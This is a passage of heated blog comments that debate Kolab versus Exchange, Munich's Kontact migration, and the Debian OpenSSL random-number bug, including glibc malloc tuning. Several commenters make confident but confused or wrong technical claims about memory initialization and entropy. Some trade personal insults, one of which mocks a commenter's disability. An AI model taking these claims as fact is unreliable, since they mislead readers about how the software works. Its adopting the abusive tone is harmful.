    One tiny point. How would anybody keep this sort of thing “secret?” I mean, it’s not like being a secret heroin addict over the weekend. Somebody is bound to notice, aren’t they? Not least, say, your friendly local Linux Sysadmin…

    But you have defeated me. When I airily suggested “absolutely nobody,” I clearly missed 36K users in Basel.

    Let me try again, then.

    “A stupendously tiny little proportion of potential customers, compared to Microsoft Exchange.
    “But, hey, 36K users in the Basel school system! And scores of other secretive types!”

    Not really an auspicious advertisement for the universal applicability of a “combined email and calendaring” system that you, yourself, Robert, dismissed as “something that nobody with a dolly bird and a bull-horn and a nifty fast car would really feel the need for.”

  124. DrLoser wrote, “Nobody cares about the pricing structure of Kolab, because nobody cares about Kolab. To be a viable competitor for Microsoft Exchange, you actually have to persuade people to use your product. It’s far from clear to me that Kolab has done this.”

    Schools in Basel have 36K users

    Kolab claims many organizations are secretly using Kolab.
    “Anyone looking for a well supported solution is a target audience of Kolab Systems. The solution is used by the Schools in the city of Basel, Switzerland, but there are also customers which Greve could not name due to NDAs with the particular customers. Some of these, he explains, are very large organizations which use Kolab as a competitive advantage they do not wish their competitors to know about. Kolab is effectively used by every size of organization – from very small enterprises to bodies as big as regional governments. It’s also used by schools in Switzerland.”

    See Kolab creates a privacy refugee camp in Switzerland

    So, instead of assuming Kolab is not used, one should assume that a business set up to produce and to support Kolab is actually doing some business. Why would anyone not use Kolab who wanted its features?

  125. DrLoser says:

    DrLoser you are googling incorrectly attempting to save Exploit Guys ass.

    There is no such thing as “googling incorrectly,” oiaohm. There is only an unremitting failure to comprehend the reality of what one has just googled.

    I leave this particular unremitting failure in your provenly capable hands.

    The reality Exploit Guy cannot code a random number source to save him self.

    Oh, I think you’ll find that modern cryptographers would balk at the description of a three-line program in C as a “random number generator.” Which wasn’t what TEG was providing in the first place: he was disproving your inane assertion that something magical in stock Debian (this being the source of the Open SSL bug) either zeros or dead-beefs memory for you.

    Which is demonstrably untrue. Demonstrably, with a three line C program. No random number generation required.

  126. DrLoser says:

    Interesting enough kontact enterprise. Is sold as Kolab Client certified 10 CHF per named user.

    You certainly have a way with words, oiaohm. Things that are not remotely “nasty” are, in your world, “nasty.” And things that are not remotely interesting are a source of unbounded fascination to you.

    Nobody cares about the pricing structure of Kolab, because nobody cares about Kolab. To be a viable competitor for Microsoft Exchange, you actually have to persuade people to use your product. It’s far from clear to me that Kolab has done this.

    Yes Kolab Client is still technically open source since when you buy the program you get access to the source code.

    Seems a bit silly, though, doesn’t it? I mean, ten swiss francs and you’re entitled to all the source code you can eat (and there’s a huge bloated pile of it).

    Considering that nobody in their right mind would buy more than a single client license, I can’t even see this paying for clearing the purchase item through EPS.

  127. oiaohm says:

    https://kolabsys.com/products/kolab-enterprise
    https://kolabsys.com/pricing
    Interesting enough kontact enterprise. Is sold as Kolab Client certified 10 CHF per named user.

    Yes DrLoser you cannot get the binaries to Kolab Client Certified without paying. This is the case with FOSS sometimes you need the binaries. Yes the Kontact Enterprise binaries from a long time ago the source of Kolab Client.

    Yes Kolab Client is still technically open source since when you buy the program you get access to the source code.

  128. oiaohm says:

    DrLoser reason for zeroing out memory on free is to prevent data leakage. The malloc flags in glibc mallopt() is in fact controllable by environmental vars. So stock features.

    http://man7.org/linux/man-pages/man3/mallopt.3.html DrLoser you are googling incorrectly attempting to save Exploit Guys ass. The reality Exploit Guy cannot code a random number source to save him self.

    So even if you build your code without mallopt enabled it can be running with the environmental set. MALLOC_PERTURB_ and MALLOC_TRIM_THRESHOLD_ are the environmental glibc responds to. These are stock part of operating in a glibc environment. Yes stock environmental flags controlling glibc.

    So — not just not stock, but also something not called by the software in question.
    Wrong DrLoser mallopt is a stock feature that can be enabled or disabled by the will of the end user so does not have to be called by the program. In fact not calling it in a program of Exploit Guys case is a coder error. Out side the control of the software developer unless they set mallopt themselves.

    Exploit Guy did not set mallopt values so his code was defective to get random data in a glibc environment. Also address randomization is most of the source of the random data Exploit Guy is seeing yet no where in Exploit Guys code does he check that address randomization is on. Remember you can turn address randomization off again this is another stock feature that administrator can change. Yes Linux kernel address randomizer depends on the Linux kernel random number generator that has known bugs in virtual machines images.

    The problem with Exploit Guy code you can cripple it just by changing configuration options. Yes a stock Linux Distrobution fresh install Exploit Guy example code appears to work. The problem is admin can come along and change a few options and his code then does not work.

    Other two is an alteration to ld.so and linker script options. Result is zeroed or deadbeaf. ld.so is part of glibc. ld.so alterations are ld.so build flags.
    Remember I mention gentoo hardened having issue with OpenSSL random this has altered the complier. Not stock Debian. Exploit guy change distribution to cover up his incompetence and then still managed to screw it up completely. Exploit guy code is way too simple. The reality it simpler to just directly call the Linux kernel random number generator than attempt to use undefined data since there are too many ways for glibc/Linux based OS to make undefined data defined. Most of the ways don’t require binaries rebuilt just altering configuration of the system. Some can be virtual machine giving the Linux system the exactly same random seed every time it starts up.

    Yes the Linux kernel random number generator is not trust-able. Linux memory is not trust-able to be random. I will state it again Undefined is not Random. Never ever mix Undefined up for Random because it does bite.

    A proper random source requires a stack of checks to make sure the system has not been altered in ways that cripple the source. Even in cpu random number generators have been screwed up by constant EM noise patterns. Proper random is very hard work and never a short simple bit of code.

  129. DrLoser says:

    Honestly, I am not even going to try and point out how irrelevant and utterly stupid your oiaohm’s entire argument is.

    Then again, somebody like me with mild OCD would be happy to assist. TEG’s original challenge:

    Compile it using GCC under any stock version of Debian and any of the CPU architectures listed here.

    And oiaohm’s typically evasive response?

    Other two is an alteration to ld.so and linker script options. Result is zeroed or deadbeaf. ld.so is part of glibc. ld.so alterations are ld.so build flags.

    Does this sound like “any stock version of Debian” to you? Because it doesn’t to me.

    I’m all excited by the tuneable parameters to malloc(). No, wait, I’m not. They are totally irrelevant, oiaohm. Quite apart from the fact that, if they were relevant (which they are not), you’d still have to call mallopt() first, wouldn’t you? So — not just not stock, but also something not called by the software in question.

    Generally speaking, and without calling calloc() or the moral equivalent, no commercial programmer of any repute whatsoever (which clearly excludes oiaohm) would rely on a release version of a program using malloc() either to dead-beef the memory or else to zero it out.

    Debug versions of the same programs are, of course, an entirely separate thing.

  130. DrLoser says:

    Repeating that doesn’t make it true. All they have to do is get it installed on a terminal server and, via X, it’s available on all GNU/Linux machines.

    And (ignoring the completely irrelevant bit about terminal servers and thin clients, which does not appear to apply to Munich), asserting a wild claim like this does not make it true, Robert.

    Ab initio, if it were this easy, the Munich IT department would already have done it. They wouldn’t need to wait until some unspecified time in the middle of 2015, would they? Unless they’re slacking off.

    Furthermore, your claim makes the huge assumption that Kontact is fit for purpose in the first place.

    My cursory reading around the thing suggests that it is anything but.

  131. That Exploit Guy says:

    That Exploit Guy that code of your does not even pass building with -Wall on due to a printf error.

    Those are just warnings about the improper use of the format specifier %d. The code will still compile and run properly, and I have no interest fiddling with crap like format specifiers just to get it absolutely perfect.

    You are mistaken and being tricked by not enough testing and not enough understanding of what the kernel is coded todo and what glibc can be configured todo.

    Then you should have no trouble proving this by showing me outputs from my program.

    Honestly, I am not even going to try and point out how irrelevant and utterly stupid your entire argument is. If even someone like Dougman can’t take you seriously, then quite frankly it’s a waste of time for me to debunk your rubbish.

    By the way, if all that you are after is a bit of adoration in an otherwise sad life for a legally disabled, why no try something like, I don’t know, eating 23-year-old luncheon meat in front of a camera? This guy did and apparently that worked out pretty well for him, so why choose instead to confuse people with stuff that has pulled out of your own backside?

  132. DrLoser wrote, “IT guys have given themselves until some time in 2015 to get their Kontact solution up and working.
    I said it last time and I’ll say it again:
    They don’t have a prayer in hell.”

    Repeating that doesn’t make it true. All they have to do is get it installed on a terminal server and, via X, it’s available on all GNU/Linux machines. I’m sure there’s an equivalent functionality for that other OS, say Cygwin/X or xrdp (deleted from Wikipedia, eh?), homepage here. Just like Wikipedia, deleting an article on xrdp for lack of “notability” when it is used on millions of terminal servers all over the world. Interestingly, it is noteworthy in German

  133. dougman says:

    Re: Outlook and Photoshop

    Both have been replaced with alternatives these days.

    SMB’s can get by with Google Apps and toss the M$ stack.

    https://www.google.com/work/apps/business/products.html

  134. DrLoser says:

    (Darned spell-checker. Must double check it next time. Kontact in all cases …)

  135. DrLoser says:

    Deaf Spy you don’t need to buy Windows to get a intergrated tool like Outlook. There is a item called kontact. Issue at Munich is that Kontact for Windows in a easy to install form is not free.

    We’ve covered contact very recently, oiaohm. Please stop repeating yourself.

    It doesn’t matter whether or not it is free: it is still supposedly available on Windows. Nothing in the Munich migration path suggests that they will not pay for tools where necessary. In this case they presumably have not.

    The windows version (as I pointed out, using the Kontact site) is to all intents and purposes defunct. The last known download is a “giant debug” version from November 2009, I seem to recall. It’s clearly not under FLOSS development at the moment.

    In any case, if you read just the installation notes, it was clearly (on Windows) crap.

    The availability of an “integrated tool” does not necessarily invite the “purchase” of said tool, oiaohm. Which is presumably why the Munich IT guys have given themselves until some time in 2015 to get their Kontact solution up and working.

    I said it last time and I’ll say it again:

    They don’t have a prayer in hell.

  136. oiaohm says:

    Deaf Spy you don’t need to buy Windows to get a intergrated tool like Outlook. There is a item called kontact. Issue at Munich is that Kontact for Windows in a easy to install form is not free.

  137. oiaohm says:

    Deaf Spy of course what I am talking about is malloc related. mallopt options M_PERTURB and M_TRIM_THRESHOLD. Other two is an alteration to ld.so and linker script options. Result is zeroed or deadbeaf. ld.so is part of glibc. ld.so alterations are ld.so build flags.

    That Exploit Guy that code of your does not even pass building with -Wall on due to a printf error.

    http://stackoverflow.com/questions/6004816/kernel-zeroes-memory Please read and take serous note. Even without using flags at time Linux can turn ass and the result from you random code complete be zero repeatedly.

    If I am not mistaken, the output should give you a nice little random number.
    You are mistaken and being tricked by not enough testing and not enough understanding of what the kernel is coded todo and what glibc can be configured todo.
    M_TRIM_THRESHOLD to 0 means every time something does a free glibc now tells the kernel it can have the page back. Result all pages the application is getting is new all the time so they are always zero. M_PERTURB turns malloc into calloc. How 0x100 of course the least significant byte. Note also M_PERTURB does this on free as well. Random data in ram can become a very limited to almost non existent.

    By C standard a undefined is undefined. Problem is undefined is not random. C standard defines a function random for a reason. If the OS decided to define undefined for some reason its legal.

    The only reason there is any value in your random other than zero is that the memory is not fresh allocation but recycled pool.
    That Exploit Guy basically you wrote a do you feel lucky punk random number generate. If the system is under heavy ram pressure you have very good odds that all your code will just return zero as every new page your application requests will be zero.

    Yes there is coding or using a proper random number generator source Or doing the stupidity you just did That Exploit Guy.

    Basically That Exploit Guy you just coded a random generator that can be predictably nonrandom. Just do a DOS attack or equal to consume up a lot of ram. Correct version of your code is checking for zeroed out at a min. Better and multi platform safe version don’t do it that way at all. If the block is completely zeroed out you have just got a fresh block from the kernel so no random data.

    Also you have to allow for complier like Visual Studios or IBM that can also allocate creative things in debugging modes.

    Worse is remember the values are recycled memory because kernel provided new is zero. If all the libraries on the system are secure and are scrubbing their memory on free your random generator will fail again except now all the time. This was the problem with openssl on hardened. systems. Kernel only provides zeros and if libraries clean up after themselves all free pages of the application that are being recycled are also all zeros.

    Never mess with undefined behaviors of C because one day they will mess with you by doing something defined just not what you are after.

    That Exploit Guy thinking it was gcc flags is completely the wrong thing. The two items that bring your foolish idea of a random generator unstuck is the kernel and glibc.

  138. DrLoser says:

    Oh, I think it’s fair to say that the one thing the IT department in Munich doesn’t lack is an “agenda,” DeafSpy.

    It just isn’t terribly well-aligned with the municipality’s governance requirements.

  139. Deaf Spy says:

    What happens when the customers wake up and install FLOSS?
    Discover that there is no alternative to Outlook and Photoshop, and buy a Mac or go back to Windows. Just see how Munich is now crippled without an integrated mail / calendar / agenda tool.

  140. “Get in with a customer, get the trust built, provide the first service and then over time cross-sell and up-sell,” he urged. “That seems to be a model that is resonating very well.”

    Yep. Lock-in in action. What happens when the customers wake up and install FLOSS? M$ is willing to take its channel down with them. OTOH, giving customers FLOSS and helping them migrate could be a growth industry with a much larger future.

  141. That Exploit Guy says:

    That Exploit Guy its a moron to think uninitialized buffer is random. glibc and others have a flag to auto initialize any uninitialized buffer with 0xdeadbeaf or 0x00000000. So not random.

    Really? Here’s a challenge for you. See this piece of code here? Compile it using GCC under any stock version of Debian and any of the CPU architecture listed here. Go nuts with the optimisation flags – I don’t care. If I am not mistaken, the output should give you a nice little random number.

    Run the compile programs at least five times. Snap a nice picture of the outputs with your mobile phone or whatever – no “I know because I am oiaohm” BS. Prove me wrong.

  142. dougman says:

    “Microsoft has had a shelf-ware problem in the past”…yes, customer are spending money and do not even use 3/4 of the software purchase.

    Best comment: Sell your customer Office 365 for less than cost. Offer them services and extensions based on that. When the customer complains, they can now never leave as they are locked-in to open standards hating Office 365 and your closed source extensions! You can now ramp prices as you see fit and there’s nothing the customer can do about it.

    http://www.channelregister.co.uk/2014/11/05/microsoft_tells_resellers_to_use_office_365_as_loss_leader/

  143. dougman says:

    Surface devices not selling well, so lets try the reseller approach.

    http://www.theregister.co.uk/2014/11/05/microsoft_testing_indirect_sales_for_surface_pro_3/

    Lets be real, the only real sales of Surface devices has been with M$ paying CNN and the NFL to visually promote the devices…LOL..

    http://hothardware.com/News/CNN-Anchors-Caught-On-Camera-Using-Microsoft-Surface-As-An-iPad-Stand/

    http://www.businessinsider.com/nfl-announcers-surface-tablets-2014-10

  144. Deaf Spy says:

    glibc and others have a flag to auto initialize any uninitialized buffer with 0xdeadbeaf or 0x00000000.
    Ohio, can you prove this with a reference, please? I am eager to learn how a library can auto-initialize a buffer without calling a memory-allocation / initialization function. Here is the source code of glibc’s malloc: ftp://g.oswego.edu/pub/misc/malloc.c

    Feel free to show us where exactly glibc “auto initialize any uninitialized buffer”.

  145. oiaohm says:

    To simply put it, the vulnerability was caused by some moron removing a reference to the uninitialised buffer buf following what Valgrind and Purify told him. This caused the PRNG to lose all of the entropy buf was meant to provide.

    That Exploit Guy its a moron to think uninitialized buffer is random. glibc and others have a flag to auto initialize any uninitialized buffer with 0xdeadbeaf or 0x00000000. So not random. This is why the OpenSSL PRNG related bug is found on gentoo hardened even that the Debian alteration was not in the source code of gentoo hardened. This came out latter. What Openssl was using that was presumed to be random when at times it was not going to be.

    Reality here is Valgrind is throwing a uninitialized buffer warning result is the complier or libc flags can rip your code to bits if you using uninitialized buffer for anything. Hardware can also rip you to bits. MMU can be dropping not actively assigned pages. Yes fun of unallocated memory it may always be zero. Hardware error being lack of ram causing unused pages to be merged into nulls. Hello without initializing buffer what says it is pointing somewhere that is not zeroed.

    Damaged hardware in the form of defective ram is detect by ecc checking. Results is Linux zones out the damaged memory. So a system is now running under ram. Linux running under ram pressure is more likely to nuke unallocated space so causing unallocated buffer accesses to no longer to be random but to be zeroed.

    Yes OpenSSL was getting people raising the issue back in 2003 that use of unallocated memory was questionable and the lead developer of OpenSSL says its fine.

    http://stackoverflow.com/questions/19706319/how-to-zero-unused-memory-to-reduce-vm-snapshot-size
    There are a lot of operation events in Linux that can result in memory blocks being filled with zeros.

    Lot of issues in Openssl were blamed on the Distribution maintainers for altering stuff. Valgrind and Purify showed errors should not be happening in the first place. .The developers of OpenSSL thought they knew better than the developers of Valgrind and Purify. The sad reality is Valgrind does not false positives when it comes to this kind of bug. Valgrind will only false negative with unallocated.

    DrLoser for particular items generating ssl stuff on fly due to the consistency of sysvinit starting stuff on the same PID numbers is also screwed(yes another advantage of systemd chaos in startup that PID are somewhat random). There are some nice cases due to openssl using current process ID that the number is static. So yep some areas openssl was not random at all. Worse due to memory pressure events this was trigger-able on systems without the debian patch. 2008 fault was quite major.

    Current process ID is not a always random value. DrLoser you talk about entropy the problem here is that openssl random number generator had a entropy of 1 under the right conditions with nothing to prevent those conditions from happening and nothing to detect that it had happened. Please note entropy of 1 without debian maintainers modification. Because the Process ID not always random and entropy pool maybe non existent so zeroed. Guess what non existent entropy pool is not detected by Openssl back then.

    Rough and hazard memory management was well and truly known of Openssl in 2007.

    Yes the 2008 Debian OpenSSL PRNG is very serous. People like That Exploit Guy try to make out that the fault was only because of the debian maintainers alteration. Missing completely that the OpenSSL random generate was broken with or without the modification. Valgrind was warning about unitialized data was in fact showing the error. Yes when Openssl was not checking that it had a valid entropy pool.

    Bruce Schneier is not a Security Auditor. Security Reporters are weaker species.

    http://arstechnica.com/business/news/2012/02/crypto-shocker-four-of-every-1000-public-keys-provide-no-security.ars
    Entropy is a huge problem for SSL. OpenSSL is not the only SSL implementation found to miss validation of produced keys and entropy pool. Yes 2012 someone decides they better do a survey of keys to double check on entropy and found that the 2008 error was only a small problem. There is something wrong with entropy being used to generate SSL from many sources.

    Validation of produced keys is harder because you need to validate against keys in existence. Conflicts ruin key.

  146. DrLoser wrote, “the amateur morons who deploy it.”

    The software is usually deployed by an OEM, or some IT-guy or the end user. They are not all morons. FLOSS is a meritocracy. Prove yourself more capable and release software and your software will be used instead of that other.

  147. DrLoser says:

    (Correction: 16 bits of entropy in theory, not 10.
    (Of course, you’d have to run your “always on” Linux system pretty heavily to get past 2^10 process ids, so I’m OK with my original statement in general.)

  148. DrLoser says:

    To simply put it, the vulnerability was caused by some moron removing a reference to the uninitialised buffer buf following what Valgrind and Purify told him. This caused the PRNG to lose all of the entropy buf was meant to provide.

    No, wait, TEG, “real world possible hardware error” can also have that effect.

    Bwahahaha!

  149. DrLoser says:

    Openssl was lacking test suite also never tested the random number generate before accepting it.

    The Debian SSL random number bug, oiaohm, had a mere ten bits of entropy, what with the asinine decision to base the Gaussian field upon Linux PIDs.

    Me, I’d call this a horrible and pathetic failure of implementation.

    But yes, you’re right, somebody should have tested it, possibly — actually, almost imperatively — via a test suite. Maybe Debian. Maybe Red Hat. Ooh, who knows, let’s roll the dice: maybe some organisation responsible for the Secure Socket Library?

    I don’t actually care how pissed off the original implementer is about this.

    I’m pissed off.

    TEG is pissed off.

    And, you know why? We, the people, have to deal with this untested undersigned arbitrary bullshit lacking in security that you incompetent FOSS morons force upon us via Linux web servers.

    Do, please, explain to us all what the “Four Freedoms” mean, when it makes no difference at all whether we examine, modify, etc the code

    … Because we have [4-LETTER WORD REMOVED – rp] -all control over the amateur morons who deploy it.

  150. DrLoser says:

    Damaged hardware would have made the same effect come out of OpenSSL.

    OK, a completely different thread.

    But I’m still notating this as idiocy #23.

    Carry on, oiaohm, carry on. But if you think that you can get the better of TEG …

    … You’re even more foolish than you constantly appear to be.

  151. DrLoser says:

    Microsoft never had the “monopoly” they claimed. Not on servers, and not on the desktop.

    fwiw, ram, Microsoft never claimed a monopoly on the desktop. The precise phrase was a [M$, natch] computer in every home.

    Ironically, Bill aimed too low. I’ve got three in mine (one desktop, one laptop, one notebook), and there’s only one of me.

    And, lest you think this vast overindulgence is because I am a M$ troll … no, it isn’t.

    As a mere contractor, I never got to share in the freebie Surface goodies or the freebie Lumia goodies.

    The desktop is basically a $300 device that affords me the opportunity to comment on this blog. Oh, and it also lets me play around with proper development systems like Visual Studio. Oh, and … never mind.

    The laptop is a “gift” from work. $1500 worth of muscular Dell crud that my employers hope will encourage me to gift them free hours … yeah, right.

    The notebook is an ex-Linux HP-1000 thing that I’ve tried and failed, multiple times, to resuscitate with Linux. Seems to work perfectly well with Windows 8.

    And I have yet to embark on my next home computer project, which will be to build a $1,000 stonkin’ Windows home server. I have no need for it, any more than Robert has any need for the Beast. But, whatever. Different strokes for different folks.

    And, as for servers? Gates never made that claim. At the time, your typical server cost somewhere upward of $500,000 or so.

    It’s only thanks to Linux cannibalising the *nix server market that NT even got a sliver of a chance to edge in with Windows 2000 Server Edition. And they’ve been building an impressive portfolio of enterprise management systems off the back of that rather weedy offering ever since.

    Linux fans should be proud of their contribution to Microsoft’s bottom line!

  152. That Exploit Guy says:

    Partly not. What the complier flag did to OpenSSL in the Debian OpenSSL case replicates real world possible hardware error. If you Debian OpenSSL Package Random Number Generator case you find the debian maintainer was very annoyed. Openssl was lacking test suite also never tested the random number generate before accepting it. Damaged hardware would have made the same effect come out of OpenSSL.

    I’ll let famous security expert Bruce Schneier educate you on the Debian OpenSSL vulnerability:

    “The bug in question was caused by the removal of the following line of code from md_rand.c… These lines were removed because they caused the Valgrind and Purify tools to produce warnings about the use of uninitialized data in any code that was linked to OpenSSL. You can see one such report to the OpenSSL team here. Removing this code has the side effect of crippling the seeding process for the OpenSSL PRNG. Instead of mixing in random data for the initial seed, the only “random” value that was used was the current process ID. On the Linux platform, the default maximum process ID is 32,768, resulting in a very small number of seed values being used for all PRNG operations.”

    To simply put it, the vulnerability was caused by some moron removing a reference to the uninitialised buffer buf following what Valgrind and Purify told him. This caused the PRNG to lose all of the entropy buf was meant to provide.

    Contrary to your assertion, the vulnerability has fundamentally nothing to do with hardware whatsoever.

    The question is was the bug detectable and had suitable auditing been performed. The answer more often than not is not enough auditing is done.

    Then where exactly were the people supposedly “auditing” the code for the Bourne-Again Shell and OpenSSL? Or did they simply “audit” by hooking two tin cans to an ohmmeter?

    We can bet there are many thousands more bugs out their that are 10 years or older that are not known in Windows/Linux and OS X.

    We can also confidently say the same thing about most Linux distros, can’t we?

  153. ram says:

    oiaohm’s comments are basically correct. It should also be noted that organisations trying to corrupt OpenSSL have funding in the BILLIONS of dollars and a staff level of many thousands. You can be absolutely positively sure that companies based in the USA that offer proprietary code have been totally compromised.

    It should also be noted that much of the Linux community have not trusted aspects of OpenSSL, specifically aspects of SSH, for quite some time. They have alternative and much leaner packages. These have been around for quite some time. Hint! Hint!

    Nudge! Nudge!

    Can say no more. If you know what I mean!

  154. oiaohm says:

    That Exploit Guy
    What’s damning about the blunder wasn’t how long the vulnerability had been present but how it had been introduced through one’s complete lack of understanding of the source code.
    Partly not. What the complier flag did to OpenSSL in the Debian OpenSSL case replicates real world possible hardware error. If you Debian OpenSSL Package Random Number Generator case you find the debian maintainer was very annoyed. Openssl was lacking test suite also never tested the random number generate before accepting it. Damaged hardware would have made the same effect come out of OpenSSL. Think device random returning a constant. A broken random generating device can return a constant. Linux debugging allows random number to be set as a constant as well. So something openssl should been checking that random was working should have stopped the openssl issue in Debian dead. So the openssl source was defective. Yes Debian Maintainer and Upstream were both guilty.

    Many other cases of hardware faults would have slipped past as well. Like a not ticking clock that was used in a section of it random generation. Also Openssl documentation about how it sourced random data was incorrect worse it never validated any of its sources for random before 2008. Debian OpenSSL was a warning bell that Openssl project was under resourced.

    So 2008 there is something critically wrong with how Openssl project is operating. Yet it takes until 2014 and another issue until companies who are using OpenSSL decide it most likely a very good idea to put more resources in. Its one thing to say its bad about Linux reality is that is not the story. Why did it take 6 years from a major set of faults being found in something like OpenSSL for companies to decide to send in Audit teams. Remember OpenSSL being used by open source and closed source development teams. Both teams under reacted.

    That Exploit Guy
    If you are looking for vulnerabilities that have managed to persist for more than ten years, look no further than Shellshock.
    One of the recent RDP bugs in Windows was in the first version of remote desktop and every version since was only found this year. Lot of bugs manage to persist for years. The question is was the bug detectable and had suitable auditing been performed. The answer more often than not is not enough auditing is done. Bad is when they take years to fix while being known. We can bet there are many thousands more bugs out their that are 10 years or older that are not known in Windows/Linux and OS X. We just have not found them yet. Reality from the way open source is being treated we can fairly much bet no one is doing enough Auditing.

  155. ram says:

    Two facts should be noted:

    Intel has its own game and is not in bed with Microsoft. Intel is holding at least a flush whereas Microsoft looks like it is holding a pair of twos.

    Microsoft never had the “monopoly” they claimed. Not on servers, and not on the desktop.

  156. That Exploit Guy says:

    Debian OpenSSL flaw once it become known was patched very quickly.

    What’s damning about the blunder wasn’t how long the vulnerability had been present but how it had been introduced through one’s complete lack of understanding of the source code.

    If you are looking for vulnerabilities that have managed to persist for more than ten years, look no further than Shellshock.

  157. oiaohm says:

    DrLoser Microsoft record of a known unpatched exploit is 10 years. Debian OpenSSL flaw once it become known was patched very quickly. Please note there are 3 SSL implementations on Linux. OpenSSL, Gnutls and Mozilla Network Security Services. Unfortunately all 3 were under resourced. BSD is working on adding a 4 implementation.

    DrLoser under debian you did have the option not to use openssl. Not everything requires it. Problem is you had to know it had a flaw to act. Unfortunately due to flaws in gnutls had seen it fall out of favor. Yes you can have a Plan A, Plan B and find yourself requiring Plan. Hopefully we end up with enough plans to allow temporary removal of defective libraries when ever exploits appear.

    Please note even that that debian flaw in openssl was open for 5 years there is not 1 documented case of it being exploited. Heartbleed appears in active exploits this is why it made the news and got a fancy name. History of remote exploits against RDP, IIS and other parts of Windows has also been on going.

    root kit yes heard of them.
    http://www.microsoft.com/security/portal/mmpc/threat/rootkits.aspx
    Yes they are a Windows problem just as much as a Linux one. Yes the first windows rootkit was 1999. Windows users talk about viruses and malware. Linux users normally talk about rootkits because the are the large worry.

  158. DrLoser wrote, ” Why would anybody choose to do that?”

    Uh, the boss distributes an e-mail with the file attached outlining his vision for the company? Four folks in different corners of the world are working on a presentation and each shares with the others his piece of the show? A potential employer asks for a sample of a candidate’s work?

  159. DrLoser says:

    I’d also be fascinated to learn of anybody who is a friend of a friend of a friend who has ever once “downloaded a PowerPoint file.”

    I mean, seriously. Why would anybody choose to do that?

  160. DrLoser says:

    Oh well, back to the infinitely tedious topic of this thread. To quote Robert’s cite:

    The main thing that you have to know is how this malware travels around. It seems that it relies on a Powerpoint file that refers to an .INF file. Of course, the mostly used method for spreading such files around is with a help of misleading emails, so be sure you ignore all of them. Once a malicious Powerpoint file is downloaded onto the system, it pulls in two files that are known as slides.inf and slide1.gif. Once these files are active, they are used to make specific system modifications and install a virus. Note that malware itself is not hiding in this malicious Powerpoint file. It is downloaded latest without any permission asked.

    tl;dr. You actually have to read the email and for some unaccountable reason decide that downloading the attached PowerPoint document is somehow appropriate.

    Look, I’m all for protecting haploid idiots with an IQ in the general vicinity of a gecko here, but … so what?

    Do you get any option with Heartbleed? No, you do not. Do you get any option with Shellshock? No, you do not. Did you get any option with that massive SSL hole in Debian, which went undetected for five years? (“Ooooh! Zero day! Almost as good as FIVE YEARS!“)

    No, no, no, no and no again.

    Try harder, Robert. This is pitiful stuff.

  161. DrLoser says:

    Deaf Guy, no one ever stated that Heathbleed and Shellshock didn’t happen. You are missing the pie for the minutia, that being Win-Dohs always suffers insecurities, etc.

    For once I agree with Dougie here. On a substantially inconsequential note: no one ever stated that Heathbleed and Shellshock didn’t happen. Because “Heathbleed” is not, as might be imagined in Metro DC, the B-Side of a Kate Bush song illustrating menstruation, but is in fact normatively referred to as “Heartbleed.”

    That, btw, is so completely inaccurate that it’s not possible to blame a spell-checker.

    Following on from the inconsequentiality, “happen” is not quite the verb a normal person would use. “Explode” is probably more like it. “Happen” suggests a one-off occurrence. “I just happened to bump into Heathcliff — wait, I mean SchollShrek — the other day.”

    Massive security lapses don’t work that way, Dougie. Massive security lapses have the potential to continue for a very, very long time.

    Have you ever heard of the term “root kit?”

  162. dougman says:

    Deaf Guy, no one ever stated that Heathbleed and Shellshock didn’t happen. You are missing the pie for the minutia, that being Win-Dohs always suffers insecurities, etc.. These vulnerability issues has been a reoccurring theme with M$ since 1995 or earlier, you would think that in 19+years time, they would have been able to squash this.

  163. Deaf Spy wrote, “Ok, let’s pretend Heathbleed and Shellshock never, ever happened. Ah, and the Debian SSL fiasco never happened, too.”

    There really are ~1000 malware for that other OS for every one of GNU/Linux’ problems. Can’t list them all here but here are some doozies… Comparing a few problems with GNU/Linux to that other OS is like comparing traffic accidents in my neighbourhood with the battle of Iwo Jima. They are not anywhere close to the same order of magnitude.

  164. Deaf Spy says:

    Ok, let’s pretend Heathbleed and Shellshock never, ever happened. Ah, and the Debian SSL fiasco never happened, too.

  165. matchrocket says:

    Banking with Microsoft’s Windows is like playing Russian Roulette with 5 chambers loaded and 1 empty.

  166. dougman says:

    Win-Doh’s patches cause blue screens, so IT idiots delay implementation when they can fully test.

    http://answers.microsoft.com/en-us/windows/forum/windows_7-windows_update/blue-screen-stop-0x50-after-applying-update/6da4d264-02d8-458e-89e2-a78fe68766fd?page=62

    Windows, some amply named is always easily broken and nothing changes with M$.

Leave a Reply